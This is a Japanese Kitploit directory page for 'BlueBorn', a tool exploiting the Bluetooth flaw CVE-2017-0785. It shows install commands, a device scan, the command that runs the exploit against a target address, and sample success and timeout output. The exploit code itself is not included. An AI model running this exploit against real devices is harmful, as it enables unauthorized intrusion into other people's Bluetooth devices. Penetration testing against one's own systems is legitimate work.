Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
BlueBorn — CVE-2017-0785 | Kitploit
ツール/GitHubGitHub/sh4rknado/blueborn
Bluetoothセキュリティ脆弱性分析エクスプロイトワイヤレスセキュリティペネトレーションテスト
GitHubsh4rknado/blueborn

BlueBorn

CVE-2017-0785

リポジトリを見る
13年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

BlueBorn

CVE-2017-0785

Archlinux インストール

paru -S python-pybluez-git bluez-utils-compat pyhton3 python3-pip

sudo pip install pwn

チュートリアル

発見

root@kitploit:~
hcitool scan
Scanning ...
      XX:XX:XX:XX:XX:XX       Device 1
      XX:XX:XX:XX:XX:XX       Device 2

エクスプロイトの使用

root@kitploit:~
python CVE-2017-0785.py TARGET=XX:XX:XX:XX:XX

[V] エクスプロイト: 完了!


 python CVE-2017-0785.py TARGET=XX:XX:XX:XX:XX ==> FAILED EXEMPLE

[◒] エクスプロイト: ターゲットに接続中

Traceback (most recent call last):

File "<string>", line 3, in connect

_bluetooth.error: (110, 'Connection timed out')

During handling of the above exception, another exception occurred:

Traceback (most recent call last):

File "/opt/Hacking-tools/Bluetooth/CVE-2017-0785/CVE-2017-0785.py", line 31, in <module>

  sock.connect((target, 1))

File "<string>", line 5, in connect

bluetooth.btcommon.BluetoothError: [Errno 110] Connection timed out
ツールをダウンロード